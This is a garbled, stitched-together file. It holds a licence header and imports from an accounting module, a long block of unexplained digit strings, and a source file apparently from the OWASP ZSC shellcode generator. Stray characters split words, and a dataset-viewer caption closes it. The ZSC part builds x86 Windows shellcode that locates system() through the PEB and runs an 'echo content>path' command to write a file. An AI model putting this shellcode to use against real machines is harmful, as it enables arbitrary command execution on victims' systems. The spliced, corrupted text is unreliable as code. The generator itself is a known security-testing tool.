# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or | FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_move_line
import account_move_reconcile
import cash_flow_type
import cash_flow_distribution
import report
import wizard |
1033915679"\
"83989576556519317788300024161353956243777784080174881937309502"\
"69990089089932808839743036773659552489130015663329407790713961"\
"46453408879151030065132193448667324827590794680787981942501958"\
"62232039513125201410996053126069655540424867054998678692302174"\
"98900954785072567297879476988883109348746442640071818316033165"\
"51153427615562240547447337804924621495213325852769884733626918"\
"64917433898782478927846891882805466998230368993978341374758702"\
"80571634941356843392939606819206177333179173820856243643363535"\
"86349449689078106401967407443658366707158692452118299789380407"\
"13750129085864657890577142683358276897855471768718442772612050"\
"26648610205153564284063236848180728794071712796682006072755955"\
"90404023317874944734645476062818954151213916291844429765106694"\
"96935401686601005519607768733539651161493093757096855455938151"\
"78956903925101495326562814701199832699220006639287537471313523"\
"42158926512620407288771657835840521964605410543544364216656224"\
"56504299901025658692727914275293117208279393775132610605288123"\
"37345106837293989358087124386938593438917571337630072031976081"\
"60446468393772580690923729752348670291691042636926209019960520"\
"12102407764819031601408586355842760953708655816427399534934654"\
"31450404019952853725200495780525465625115410925243799132626271"\
"60909940290226206283675213230506518393405745011209934146491843"\
"32364656937172591448932415900624202061288573292613359680872650"\
"04562828455757459659212053034131011182750130696150983551563200"\
"31078460190656549380654252522916199181995960275232770224985573"\
"82489988270746593635576858256051806896428537685077201222034792"\
"99393617926820659014216561592530673794456894907085326356819683"\
"86177226824991147261573203580764629811624401331673789278868922"\
"03259334986179702199498192573961767307583441709855922217017182"\
"71277753449150820527843090461946083521740200583867284970941102"\
"26695392144546106621500641067474020700918991195137646690448126"\
"25369153716229079138540393756007783515337416774794210038400230"\
"95185099454877903934612222086506016050035177626483161115332558"\
"70507354127924990985937347378708119425305512143697974991495186"\
"53592040383023571635272763087469321962219006426088618367610334"\
"00225547747781364101269190656968649501268837629690723396127628"\
"22304114181361006026404403003599698891994582739762411461374480"\
"05969706257676472376606554161857469052722923822827518679915698"\
"39074767114610302277660602006124687647772881909679161335401988"\
"40275799217416767879923160396356949285151363364721954061117176"\
"38737255572852294005436178517650230754469386930787349911035218"\
"53292972604455321079788771144989887091151123725060423875373484"\
"25708606406905205845212275453384800820530245045651766951857691"\
"20004281675805492481178051983264603244579282973012910531838563"\
"82120621553128866856495651261389226136706409395333457052698695"\
"69235035309422454386527867767302754040270224638448355323991475"\
"36344104405009233036127149608135549053153902100229959575658370"\
"38126196568314428605795669662215472169562087001372776853696084"\
"70483332513279311223250714863020695124539500373572334680709465"\
"48308920980153487870563349109236605755405086411152144148143463"\
"43727327104502776866195310785832333485784029716092521532609255"\
"93265560067212435946425506599677177038844539618163287961446081"\
"78927217183690888012677820743010642252463480745430047649288555"\
"40906218515365435547412547615276977266776977277705831580141218"\
"68801170502836527554321480348800444297999806215790456416195721"\
"78450892848980642649742709057912906921780729876947797511244730"\
"99140605062994689428093103421641662993561482813099887074529271"\
"04843363081840412646963792584309418544221635908457614607855856"\
"47381493142707826621518554160387020687698046174740080832434366"\
"38235455510944949843109349475994467267366535251766270677219418"\
"19197719637801570216993367508376005716345464367177672338758864"\
"40564487156696432104128259564534984138841289042068204700761559"\
"91684303899934836679354254921032811336318472259230555438305820"\
"94167562999201337317548912203723034907268106853445403599356182"\
"57631283776764063101312533521214199461186935083317658785204711"\
"36433122676512996417132521751355326186768194233879036546890800"\
"82713528358488844411176123410117991870923650718485785622102110"\
"00977699445312179502247957806950653296594038398736990724079767"\
"04082679400761872954783596349279390457697366164340535979221928"\
"87057495748169669406233427261973351813662606373598257555249650"\
"80726012366828360592834185584802695841377255897088378994291054"\
"80033111388460340193916612218669605849157148573356828614950001"\
"09759112521880039641976216355937574371801148055944229873041819"\
"80808564726571354761283162920044988031540210553059707666636274"\
"32830891688093235929008178741198573831719261672883491840242972"\
"29043496552694272640255964146352591434840067586769035038232057"\
"93413298159353304444649682944136732344215838076169483121933311"\
"81906109614295220153617029857510559432646146850545268497576480"\
"80800922133581137819774927176854507553832876887447459159373116"\
"47060109124460982942484128752022446259447763874949199784044682"\
"25736096853454984326653686284448936570411181779380644161653122"\
"60021491876876946739840751717630751684985635920148689294310594"\
"20245796962292456664488196757629434953532638217161339575779076"\
"37076456957025973880043841580589433613710655185998760075492418"\
"21171488929522173772114608115434498266547987258005667472405112"\
"00738345927157572771521858994694811794064446639943237004429114"\
"74721818022482583773601734668530074498556471542003612359339731"\
"91445859152288740871950870863221883728826282288463184371726190"\
"30577714765156414382230679184738603914768310814135827575585364"\
"59772165002827780371342286968878734979509603110889919614338666"\
"06845069742078770028050936720338723262963785603865321643234881"\
"55755701846908907464787912243637555666867806761054495501726079"\
| "14293083128576125448194444947324481909379536900820638463167822"\
"06480953181040657025432760438570350592281891987806586541218429"\
"21727372095510324225107971807783304260908679427342895573555925"\
"72380551144043800123904168771644518022649168164192740110645162"\
"431101700056691121733189423400 | 54795968466980429801736257040673"\
"28212996215368488140410219446342464622074557564396045298531307"\
"40908460849965376780379320189914086581466217531933766597011433"\
"60862500982956691763884605676297293146491149370462446935198403"\
"53444913514119366793330193661766365255514917498230798707228086"\
"85962611266050428929696653565251668888557211227680277274370891"\
"38963977225756489053340103885593112567999151658902501648696142"\
|
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/inde | x.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core i | mport stack
def create_file(create_command):
    """Return x86 Windows shellcode (AT&T syntax) that runs a command.

    The template resolves kernel32 via the PEB, locates GetProcAddress,
    loads msvcrt.dll, calls system() with the command pushed by
    ``create_command`` (spliced into the ``{0}`` slot), then calls exit().

    :param create_command: asm snippet that pushes the command string
        onto the stack (produced by stack.generate in run()).
    """
    return '''
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
xor %esi,%esi
mov %edx,%esi
xor %ecx,%ecx
push %ecx
push $0x41797261
push $0x7262694c
push $0x64616f4c
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
mov $0x6c6c,%cx
push %ecx
push $0x642e7472
push $0x6376736d
push %esp
call *%eax
xor %edi,%edi
mov %eax,%edi
xor %edx,%edx
push %edx
mov $0x6d65,%dx
push %edx
push $0x74737973
mov %esp,%ecx
push %ecx
push %edi
xor %edx,%edx
mov %esi,%edx
call *%edx
xor %ecx,%ecx
{0}
push %esp
call *%eax
xor %edx,%edx
push %edx
push $0x74697865
mov %esp,%ecx
push %ecx
push %edi
call *%esi
xor %ecx,%ecx
push %ecx
call *%eax
'''.format(create_command)
def run(data):
    """Build shellcode that writes ``data[1]`` into the file ``data[0]``.

    The file is produced by shelling out to ``echo content>path`` via the
    system() call embedded in the create_file template.
    """
    target = data[0]
    content = data[1]
    command = "echo " + content + ">" + target
    return create_file(stack.generate(command, "%ecx", "string"))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.